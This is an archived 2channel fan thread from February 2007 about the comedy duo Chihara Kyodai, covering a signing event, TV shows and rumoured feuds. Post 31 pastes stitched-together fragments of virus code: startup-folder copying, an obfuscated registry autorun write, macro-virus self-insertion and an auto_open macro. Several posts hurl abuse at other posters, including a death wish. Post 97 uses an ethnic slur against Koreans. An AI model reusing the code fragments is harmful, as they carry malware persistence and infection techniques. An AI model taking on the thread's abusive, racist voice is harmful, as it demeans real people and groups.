5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

千原兄弟 part39

1 :名無しさん@板分割議論中:2007/02/17(土) 16:38:00
千原兄弟のスレッドです。
sage推奨

公式 http://mycasty.jp/chihara

前スレ part38
http://tv9.2ch.net/test/read.cgi/geinin/1167323675/




2 :名無しさん@板分割議論中:2007/02/17(土) 16:40:06
2ゲト

3 :名無しさん@板分割議論中:2007/02/17(土) 16:46:16
乙です!

4 :名無しさん@板分割議論中:2007/02/17(土) 17:01:49
>>1乙!
名古屋サイン会すごい微妙だったよ\^o^/
機嫌悪
残念だ…

5 :名無しさん@板分割議論中:2007/02/17(土) 17:03:32
また、売名目的でクソ兄弟のスレ作ったの?
売名目的でクソ兄弟のスレPart 39もあるんだって。


6 :名無しさん@板分割議論中:2007/02/17(土) 17:08:56
同じネタばかりでロクな話題ないね。このスレ、何人で廻してるんだ?

7 :名無しさん@板分割議論中:2007/02/17(土) 17:40:41
アンデュは前、東京で大地震が来るみたいな噂があって地震が来るから松本さんとかと名古屋に行った等話してた。本当に始めは眠たそうな顔だった。

8 :名無しさん@板分割議論中:2007/02/17(土) 17:52:14
サイン会どれくらいの人が来てましたか?

9 :名無しさん@板分割議論中:2007/02/17(土) 18:40:21
雨で野外だったからね…まあ100人くらい
簡単に入れたよorz
そしてアナウンサー?のお姉さんはグダグダでジュニアが苦笑し首を傾げてた('A`)

10 :名無しさん@板分割議論中:2007/02/17(土) 20:02:09
凄く寒い中でのサインは大変だったと思う。
手が悴む。
写真取れたり、握手できたので嬉しかった。
一人で来てる人や、男の人も結構いたよ。

11 :名無しさん@板分割議論中:2007/02/17(土) 20:51:12
写真は禁止だったぞ!
空気嫁
名古屋は警備ゆるすぎるから勘違いがいて困るな

12 :名無しさん@板分割議論中:2007/02/17(土) 21:18:38
アホのオバハンの巣やねんなここ
ファンに恵まれへん千原
売れへんわ

13 :名無しさん@板分割議論中:2007/02/17(土) 22:18:52
行きたかったのに予定日近いからって親に阻止された…

14 :名無しさん@板分割議論中:2007/02/17(土) 23:33:53
予定日?
皆なんかサイン以外書いてもらった?

15 :名無しさん@板分割議論中:2007/02/18(日) 01:19:42
チハラトーク数回 サイン会 6人の作家〜 15弱すべて一人で行きましたよ
今度一人の人、話し掛けてみようかな

きっと同性2人で来てる人は、千原好きな異性の友達が、いないと思う 俺もそんな感じ。

16 :名無しさん@板分割議論中:2007/02/18(日) 02:08:06
ジュニアが陣内の結婚のお祝いコメント出したって

17 :名無しさん@板分割議論中:2007/02/18(日) 02:33:48
それ気になってたんだよ
結婚式のはずなのに名古屋いるしなーと思って

18 :名無しさん@板分割議論中:2007/02/18(日) 03:59:42
アンデュで陣内の結婚についての質問あったって本当?
なんて答えてたんだろ。

19 :名無しさん@板分割議論中:2007/02/18(日) 06:39:06
夢中で頑張るきみへエールを♪って言ってました

20 :名無しさん@板分割議論中:2007/02/18(日) 07:55:55
きちがい死ねよ

21 :名無しさん@板分割議論中:2007/02/18(日) 08:29:55
陣内の挙式はなるみとかは行ったらしいけど
芸能人は少なかったみたい。
5月の披露宴にきっとでるんでは。中継するよ。

22 :名無しさん@板分割議論中:2007/02/18(日) 09:27:10
>14
ぁたし妊婦なんだぉ(-з-)
23日が予定日
めッちャ行く気で張り切ッて準備したのに…

23 :名無しさん@板分割議論中:2007/02/18(日) 12:05:37
つチラシの裏

24 :名無しさん@板分割議論中:2007/02/18(日) 12:29:28
こんなアホがオカンだなんて子供が可哀想です > <

25 :名無しさん@板分割議論中:2007/02/18(日) 14:22:31
>>24だな
子供の事考えて行かないのが当たり前

26 :名無しさん@板分割議論中:2007/02/18(日) 16:34:46
子どものことを考えない妊婦がいるのはここですか?

27 :名無しさん@板分割議論中:2007/02/18(日) 18:52:11
テンプレに「次スレ立てる番号」入れて欲しかった…。

28 :名無しさん@板分割議論中:2007/02/18(日) 20:29:28
ほんまにキモアホオバハンだらけやな

29 :名無しさん@板分割議論中:2007/02/18(日) 21:46:27
最近、某芸人のDVD-BOX買ったんだけど
千原も昔のんを出してくれないだろうか…

30 :名無しさん@板分割議論中:2007/02/18(日) 22:10:00
そうだよねpinkより前のやつかなり観たいんだけど!

31 :名無しさん@板分割議論中:2007/02/18(日) 22:32:24
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


32 :名無しさん@板分割議論中:2007/02/18(日) 22:51:25
>>27
なら次からてめーで立てれよ

33 :名無しさん@板分割議論中:2007/02/19(月) 02:15:51
PC入力おもしろかった

34 :名無しさん@板分割議論中:2007/02/19(月) 12:53:05
>>32
じゃ立てるけど、アンタは来ないでね。

35 :名無しさん@板分割議論中:2007/02/19(月) 17:18:43
ジュニアの乗ってる車ってなんですか?
こないだ何かで「イカツイ感じ」って本人が言ってたので…。

36 :名無しさん@板分割議論中:2007/02/19(月) 18:44:32
ロマンポルシェ

37 :名無しさん@板分割議論中:2007/02/19(月) 19:03:45
黒のセドリックらしぃ ヤーさんの需要も多いとか…

38 :名無しさん@板分割議論中:2007/02/19(月) 21:16:00
車は昔SWITCHとかに載ってたよ
ルミネとか観覧とか都内でのイベント行けばたいがい自分の車で来てるから発見できること多いよ
トークは微妙だけど

39 :名無しさん:2007/02/19(月) 22:31:17
今日店長(26男)に
「土曜千原ジュニア見てきた、カッコよかった」て言ったら
「面白いことはあってもカッコよくはないだろ」
「カッコイイって」
「いや、カッコよくはないだろ」って全否定されたよ

靖史と間違えてるのかな?

40 :名無しさん:2007/02/20(火) 00:16:05
>>39
ジュニアカッコいいよ
私は「ジュニア面白いしカッコいいよね」って友達に言ったら
「ジュニアって誰?」
と言われた・・・。
普通に傷ついた。

41 :名無しさん:2007/02/20(火) 00:28:44
車の事聞いたものです。
下らない事なのに答えてくれてありがとうございます。

42 :名無しさん:2007/02/20(火) 00:47:37
テレ朝にジュニアでてるよ

43 :名無しさん:2007/02/20(火) 01:03:38
ジュニアは才能有り余ってる
お兄ちゃんもいい
ただ顔に難がある
ジュニアは顔でかセキセイインコの目
お兄ちゃんは歯茎頬骨禿げ変なホクロ細い目
でもジュニアは事故後のほうがちょっといい男になったな


44 :名無しさん:2007/02/20(火) 01:16:06
>>41
どういたしましてw

45 :名無しさん:2007/02/20(火) 03:40:26
左のまぶたが、未だにちょっと、あれなんだね。

46 :名無しさん:2007/02/20(火) 10:24:33
来週の月夜たのしみだね


47 :名無しさん:2007/02/20(火) 15:08:16
てぽd発射スルーにだニダ

48 :名無しさん:2007/02/20(火) 16:36:08
セドリックといってもかなり古いやつだょ 旧車です。

49 :名無しさん:2007/02/20(火) 17:18:22
>>46
ジュニ出るの?

50 :名無しさん:2007/02/20(火) 17:26:53
チラッとテレビで見たけど330セドリック?
まさかと思ったけどあれ330なら相当金掛けてるな!

51 :名無しさん:2007/02/20(火) 17:32:18
千原兄弟ってシンスケとか上から圧力かけられたんじゃないの?


52 :名無しさん:2007/02/20(火) 17:39:28
>>51
なんで圧力かけられたの?三枝と仕事できないってなったのは知ってるけど…

53 :名無しさん:2007/02/20(火) 17:46:33
>>52
ダウンタウン以前の先輩芸人や会社の上の者から嫌われてるでしょ。
東京来た当初は人あたり良さそうな感じじゃ無かったし。
シンスケやトミーズ雅あたりが圧力かけてそう
あきらかに今の位置はおかしいと思う

54 :名無しさん:2007/02/20(火) 18:02:34
かなり昔ラジオで言ってたよね。ある大物に圧力かけられたからしばらくフジテレビ出れないみたいなこと。

55 :名無しさん:2007/02/20(火) 20:31:02
>>53
トミーズは関東でそんなに力持ってないだろ?
ヘキサゴン見てる限り紳助のジュニアへの態度がそっけない感じする
靖史には普通みたいだけど

56 :名無しさん:2007/02/20(火) 21:11:54
まっちゃんとかダブルコージと仲良いのが救いだな
三枝いい奴だと思ってたけどあんなことくらいで誤解して怒るなんて
嫌な大人だ

57 :名無しさん:2007/02/20(火) 21:34:36
あんなこと?

58 :名無しさん:2007/02/20(火) 22:21:39
どんなこと?

59 :名無しさん:2007/02/20(火) 23:56:05
>>56
あんなことをkwsk

60 :名無しさん:2007/02/21(水) 09:14:10
私も気になる。

61 :名無しさん:2007/02/21(水) 12:03:30
uz

62 :名無しさん:2007/02/21(水) 13:34:35
「六人の放送作家」で三氏をネタにしたことしか浮かばん

63 :名無しさん:2007/02/21(水) 13:41:10
結構みんなしらんのね。
ここでも前話題になったよ。

64 :名無しさん:2007/02/21(水) 14:02:55
あんなこととは、若手の頃千原の番組に呼んだ時、
スタッフの指示で呼び捨てにしたら中断して「ちょっといらっしゃ〜い」て
なったやつだよね?

フジにでれないように圧力かけられた話詳しく聞きたい。

65 :名無しさん:2007/02/21(水) 15:12:30
杏野ちゃんのブログによると今日ジュニアの進めのロケ。ゲスト誰だろ

66 :名無しさん:2007/02/21(水) 18:47:47
●お笑い対談:千原ジュニア×品川ヒロシ「ふたりの芸人作家の真逆な青春物語」
http://www.zasshi.com/ZASSHI_SOKUHOU/data/joseiseven.html
女性セブン(3/8)

67 :名無しさん:2007/02/21(水) 21:13:56
ちょっと前のトークで話してなかったっけ?三枝師匠の件。

68 :名無しさん:2007/02/21(水) 22:08:09
この兄弟、田舎者だよね。

69 :名無しさん:2007/02/21(水) 22:37:52
今回のやりすぎDVDBOX、店で見て買うか一瞬迷ったぞw

70 :名無しさん:2007/02/21(水) 22:44:58
くさりをズボンに付けたら、かっこいいと思ってるんだろうな。

71 :名無しさん:2007/02/22(木) 00:00:30
>>70
あれは財布につながってるんじゃないの?

72 :名無しさん:2007/02/22(木) 01:21:36
つウォレットチェーン

73 :名無しさん :2007/02/22(木) 06:41:36
ネームバリューがなきゃ誰もよまないような
小説出しといてもう小説家気取りなとこあるよね。


74 :名無しさん:2007/02/22(木) 10:51:00
>>55
松伸に出た時の伸助のジュニアに対する態度が忘れられない。
あきらかに嫌ってる感じがした

75 :名無しさん:2007/02/22(木) 10:56:08
すんげ〜ベスト10の時にジュニアがどさくさ紛れに大声で「トミーズの雅死んだらええねん!!いや、ほんでね〜」
って普通に次の話題行こうとしてたの思い出してワロタ


76 :名無しさん:2007/02/22(木) 13:55:02
>>75
その内容読んでワロタ

77 :名無しさん:2007/02/22(木) 17:41:33
雅は嫌な噂たくさん聞くわ
中川兄虐めてたり

78 :名無しさん:2007/02/22(木) 21:19:33
>>74
松紳の紳助って笑いをとろうとしてなかったから素に近い気がする
オススメの駅弁コーナーでも『これは旨いけど、こっちのは大したことない』って言ったり、プラン9が出た時も
目が違う
ジュニアの回も見たかったな

79 :名無しさん:2007/02/22(木) 21:27:18
Fandangoのチハラトーク見た?
やたらと規制の「バキューン」音が多すぎた。
「オナニー」は放送しても大丈夫だろ?
世知辛い世の中だね〜

80 :名無しさん:2007/02/22(木) 22:04:01
もう題と解はじまってる?

81 :名無しさん:2007/02/22(木) 22:50:31
「だから恋すんのイヤやねん」

82 :名無しさん:2007/02/22(木) 22:51:00
>>79
オナニーがダメでヤリマンがOK。
よくわからん。

83 :名無しさん:2007/02/22(木) 23:20:36
ちばてつやの話に対する赤ちゃん言葉が笑えたw>配信

84 :名無しさん:2007/02/22(木) 23:28:50
和田アキコの個人授業、昨日はジュニアのオオギリ講座だと思って
録画しておいたら、光ゲンジがスケートしてた・・・。

85 :名無しさん:2007/02/23(金) 01:55:09
>>84
一緒。
悲しかった…。
来週??

86 :名無しさん:2007/02/23(金) 03:14:37
ちばてつやの話って?
気になる…

87 :名無しさん:2007/02/23(金) 06:40:32
顔つきが柔らかくなった、彼女がいるんですか?の問いに
「さぁどうでしょ〜〜〜」の表情、言い方、
ありゃ絶対今ラブラブだな

結婚しちゃうとサビシスwww
私もウレディングベル歌おう

88 :名無しさん:2007/02/23(金) 06:42:05
ウ、ウエディングベルの間違いだ…

89 :名無しさん:2007/02/23(金) 06:59:16
>>87
結婚したら毒が抜けそうだな

90 :名無しさん:2007/02/23(金) 08:19:04
弟のほうなんか俺ちょっとかっこいいでしょ〜みたいな雰囲気だしてるのはなんで?
整形しても全然ですけどwwwwwwwww

91 :名無しさん:2007/02/23(金) 10:01:27
なに云ってんの実際かっこいいんだからしょうがないじゃん 運動は多少不足してるけど 芸人だから問題ナシ

92 :名無しさん:2007/02/23(金) 14:03:12
87>ジュニアさん、彼女出来たの〜(〒_〒)そんな〜ショックだよ(Θ_Θ)

93 :名無しさん:2007/02/23(金) 17:29:47
一月のチハラトークで言ってた、陣内がキレたマネージャーって市岡?
名前を連呼しすぎてピー音が追いついてなかったな。

94 :名無しさん:2007/02/23(金) 17:47:21
ゼロ岡さんは本当に生まれてきてドンマイな人だな。

95 :名無しさん:2007/02/23(金) 20:15:46
私も0岡だと思った。確かに昔からのエピソード聞くたび残念なやつだなぁって思ってたけど本トの答えはチハラトーク行った人しかわからんからね…

96 :名無しさん:2007/02/23(金) 20:18:54
チハラトーク行ったけど、市岡じゃなくて、風俗好きの稲垣でしたよ〜。

97 :名無しさん:2007/02/23(金) 20:36:56
特に弟のほうが、ガラが悪くて知能の劣る朝鮮人にしかみえないんだが。

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)